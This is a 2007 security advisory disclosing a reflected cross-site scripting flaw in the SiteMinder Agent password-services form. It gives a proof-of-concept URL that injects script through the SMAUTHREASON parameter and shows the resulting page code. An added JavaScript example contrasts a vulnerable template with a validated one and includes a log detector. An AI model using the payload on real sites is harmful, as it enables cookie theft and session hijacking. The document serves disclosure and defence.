
SiteMinder Agent: Cross Site Scripting






# Exploit in [XSS]:

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS] 


# Cross Site Scripting (Code):

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 

In this way the alert() call is injected into the existing function
resetCredFields() without any angle brackets or <script> tags, because the
SMAUTHREASON value is reflected directly inside the page's own script.


-------------------------------
function resetCredFields()
{

    if (1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 0 || 1)
    {
    alert(document.cookie);
    }
}
function drop(){

if( 0 == 4 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 5 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 28 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 30 )
    {
        document.PWChange.PASSWORD.value = '';
    }
    else if (1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 1 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 18 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 20 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 22 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 31 || 1)
    {
    alert(document.cookie);
    }
}
function drop(){

if( 0 == 34)
    {
        document.PWChange.NEWPASSWORD.value = '';
        document.PWChange.CONFIRMATION.value = '';
    }
}
...

-------------------------------
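The listing above is the script the browser receives once the parameter has been reflected. The following is an added example, not part of the original advisory and not CA/SiteMinder code: it models the mechanism with a deliberately simplified, hypothetical page template (a single `if (SMAUTHREASON == 30)` test, rather than the real form's script), shows the hardened form a defender would want (the value is validated as a numeric reason code before it reaches the template, and emitted as a JSON literal), and includes a small log-scanning check that flags non-numeric SMAUTHREASON values. The function names `extractReason`, `buildResetScriptUnsafe`, `buildResetScriptSafe`, `isSuspiciousReason`, `flagSuspiciousUrls` and `tryBuildSafe` are all invented for this example; the first sample URL is the advisory's own proof of concept, the second is a constructed benign request.

```javascript
// Added example (not from the original advisory, not SiteMinder code).
// Models a query parameter being reflected straight into generated
// JavaScript and the server-side hardening that prevents it.

const REASON_PARAM = 'SMAUTHREASON';
const REASON_SHAPE = /^[0-9]{1,4}$/; // assumption: reason codes are small non-negative integers

// Return the raw SMAUTHREASON value from a request URL (null when absent).
function extractReason(url) {
  return new URL(url).searchParams.get(REASON_PARAM);
}

// Vulnerable pattern (hypothetical template): the raw parameter is spliced
// into script source with no validation or encoding, so a value containing
// ')' or '}' closes the intended expression and the remainder is compiled
// as code, which is exactly the shape of the advisory's listing above.
function buildResetScriptUnsafe(reason) {
  return [
    'function resetCredFields()',
    '{',
    '    if (' + reason + ' == 30)',
    '    {',
    "        document.PWChange.PASSWORD.value = '';",
    '    }',
    '}',
  ].join('\n');
}

// Hardened pattern: enforce the numeric shape before the value reaches the
// template. Anything else is rejected outright rather than "cleaned", and
// the accepted value is emitted via JSON.stringify so the generated script
// can only ever contain a number literal at that position.
function buildResetScriptSafe(reason) {
  if (typeof reason !== 'string' || !REASON_SHAPE.test(reason)) {
    throw new Error('SMAUTHREASON must be a small non-negative integer');
  }
  const code = JSON.stringify(Number(reason)); // e.g. "30"
  return [
    'function resetCredFields()',
    '{',
    '    if (' + code + ' == 30)',
    '    {',
    "        document.PWChange.PASSWORD.value = '';",
    '    }',
    '}',
  ].join('\n');
}

// Detection: a request whose SMAUTHREASON is present but not purely numeric
// is worth flagging when scanning access logs for probes of this form.
function isSuspiciousReason(url) {
  const reason = extractReason(url);
  return reason !== null && !REASON_SHAPE.test(reason);
}

function flagSuspiciousUrls(urls) {
  return urls.filter(isSuspiciousReason);
}

// Result of the hardened builder for a URL, or null when the value was rejected.
function tryBuildSafe(url) {
  try {
    return buildResetScriptSafe(extractReason(url));
  } catch (e) {
    return null;
  }
}

// Constructed sample requests: the advisory's proof of concept and a benign one.
const SAMPLE_URLS = [
  'https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0',
  'https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=30',
];

// Stand-alone run: show what the unsafe template produces for the PoC,
// that the hardened template rejects it, and which URLs get flagged.
console.log(buildResetScriptUnsafe(extractReason(SAMPLE_URLS[0])));
console.log('hardened result for PoC:', tryBuildSafe(SAMPLE_URLS[0]));
console.log('flagged:', flagSuspiciousUrls(SAMPLE_URLS));
```

The point of the hardened builder is that it never tries to escape the value: a reason code has one legitimate shape, so the server validates against that shape and refuses anything else. Encoding would also work for a free-text field, but for an enumerated code an allow-list is simpler and leaves no room for a context break. The log check is the same rule applied at detection time, so the two stay in step.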


Regards,
Giuseppe Gottardi (aka oveRet)

---
Giuseppe Gottardi
Senior Security Engineer at Communication Valley S.p.A.
E-mail: overet@securitydate.it 
Web: http://overet.securitydate.it 

Wednesday November 07, 2007.
